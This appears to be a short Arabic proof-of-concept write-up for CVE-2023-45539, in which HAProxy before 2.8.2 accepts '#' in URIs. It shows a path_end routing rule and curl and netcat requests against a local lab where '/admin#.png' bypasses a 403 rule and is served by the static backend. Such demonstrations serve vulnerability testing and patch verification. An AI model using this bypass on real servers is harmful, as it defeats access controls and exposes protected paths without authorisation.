
HAProxy-CVE-2023-45539-PoC
HAProxy قبل الإصدار 2.8.2 يقبل # كجزء من مكوّن URI، مما قد يسمح للمهاجمين عن بُعد بالحصول على معلومات حساسة أو تأثيرات أخرى غير محددة عند إساءة تفسير قاعدة path_end، مثل توجيه index.html#.png إلى خادم ثابت.
acl is_static path_end .png .jpg .gif .css .js
use_backend be_static if is_static
هذا يعني:
إذن:
/admin#.png → يطابق .png → يُوجَّه إلى be_static → تجاوز
/admin#.asc → لا يطابق → يبقى في be_app → يصطدم بالرفض → 403
curl -i http://localhost:6655/public
HTTP/1.1 200 OK
content-length: 7
content-type: text/plain
APP OK
curl -i http://localhost:6655/admin
HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html
<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>
printf 'GET /admin#.png HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc -q1 127.0.0.1 6655
HTTP/1.1 200 OK
content-length: 31
content-type: text/plain
STATIC OK (routed by path_end)